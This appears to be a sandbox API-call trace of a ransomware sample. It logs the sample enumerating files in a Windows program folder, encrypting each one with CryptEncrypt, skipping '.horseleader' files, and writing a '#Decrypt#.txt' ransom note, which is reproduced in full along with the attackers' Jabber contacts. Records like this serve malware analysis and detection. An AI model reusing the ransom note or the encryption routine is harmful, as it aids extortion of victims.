lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1bf7c2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f1bf7c2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.527] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.527] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png") returned 91 [0251.527] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.527] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.527] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.527] lstrlenW (lpString=".testttjffg") returned 11 [0251.528] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.528] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.528] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.528] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.529] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1e591f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f1e591f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.529] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.529] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png") returned 86 [0251.529] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.529] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.529] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.530] lstrlenW (lpString=".testttjffg") returned 11 [0251.530] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.530] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.530] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.530] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\full\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.531] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1e591f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f1e591f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d08bb61, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.531] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.531] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png") returned 92 [0251.531] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.531] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.531] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.531] lstrlenW (lpString=".testttjffg") returned 11 [0251.531] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.531] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.531] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.532] 
CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.532] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f173508, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f173508, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d08bb61, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.532] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.532] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png") returned 83 [0251.532] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.532] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.533] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.533] lstrlenW (lpString=".testttjffg") returned 11 [0251.533] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.533] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.533] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.533] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.534] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f199665, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f199665, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d08bb61, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.534] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.534] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png") returned 89 [0251.534] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.534] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.534] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.534] lstrlenW (lpString=".testttjffg") returned 11 [0251.534] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.534] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | 
out: pbBuffer=0x32aea98) returned 1 [0251.534] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.534] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.535] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f231bd9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f231bd9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d08bb61, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb92, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="pushplaysubpicture.png", cAlternateFileName="")) returned 1 [0251.535] lstrcmpiW (lpString1="pushplaysubpicture.png", lpString2="Windows") returned -1 [0251.535] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png") returned 75 [0251.535] StrStrIW (lpFirst="pushplaysubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.536] lstrcmpW (lpString1="pushplaysubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.536] lstrcmpW (lpString1="pushplaysubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.536] lstrlenW (lpString=".testttjffg") returned 11 [0251.536] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.536] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.536] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.536] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\pushplaysubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.536] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f231bd9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f231bd9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d08bb61, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb92, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="pushplaysubpicture.png", cAlternateFileName="")) returned 0 [0251.536] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.537] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\#Decrypt#.txt") returned 66 [0251.537] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.539] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client 
installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.539] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.540] lstrlenA (lpString="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") returned 1368 [0251.540] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.540] CloseHandle (hObject=0x158) returned 1 [0251.540] GetProcessHeap () returned 0x780000 [0251.540] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.540] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eec5c7e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eec5c7e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x75ba, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Heart_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.540] lstrcmpiW (lpString1="Heart_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.540] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned 71 [0251.540] StrStrIW (lpFirst="Heart_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.541] lstrcmpW (lpString1="Heart_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.541] lstrcmpW (lpString1="Heart_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.541] lstrlenW (lpString=".testttjffg") returned 11 [0251.541] 
StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.541] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.541] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.541] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.542] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea2923b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea2923b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="heart_glass_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.542] lstrcmpiW (lpString1="heart_glass_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.542] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned 73 [0251.542] StrStrIW (lpFirst="heart_glass_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.542] lstrcmpW (lpString1="heart_glass_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.542] lstrcmpW (lpString1="heart_glass_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.542] lstrlenW (lpString=".testttjffg") returned 
11 [0251.542] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.542] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.542] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.543] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_glass_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.543] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eec5c7e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eec5c7e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1278, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Heart_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.543] lstrcmpiW (lpString1="Heart_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.543] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png") returned 77 [0251.543] StrStrIW (lpFirst="Heart_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.543] lstrcmpW (lpString1="Heart_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.543] lstrcmpW (lpString1="Heart_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 
[0251.543] lstrlenW (lpString=".testttjffg") returned 11 [0251.543] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.543] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.543] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.543] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.543] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eeebddb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6eeebddb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1240d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x166e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Heart_VideoInset.png", cAlternateFileName="")) returned 1 [0251.544] lstrcmpiW (lpString1="Heart_VideoInset.png", lpString2="Windows") returned -1 [0251.544] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png") returned 68 [0251.544] StrStrIW (lpFirst="Heart_VideoInset.png", lpSrch=".horseleader") returned 0x0 [0251.544] lstrcmpW (lpString1="Heart_VideoInset.png", lpString2="#Decrypt#.txt") returned 1 [0251.544] lstrcmpW (lpString1="Heart_VideoInset.png", lpString2="_uninstalling_.png") returned 
1 [0251.544] lstrlenW (lpString=".testttjffg") returned 11 [0251.544] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png", lpSrch=".testttjffg") returned 0x0 [0251.544] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.544] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.544] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.544] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0fd11ff, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa787f65, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa108fe2a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="HueCycle", cAlternateFileName="")) returned 1 [0251.544] lstrcmpiW (lpString1="HueCycle", lpString2="Windows") returned -1 [0251.545] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned 56 [0251.545] lstrcmpW (lpString1="HueCycle", lpString2=".") returned 1 [0251.545] lstrcmpW (lpString1="HueCycle", lpString2="..") returned 1 [0251.545] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.545] GetProcessHeap () returned 
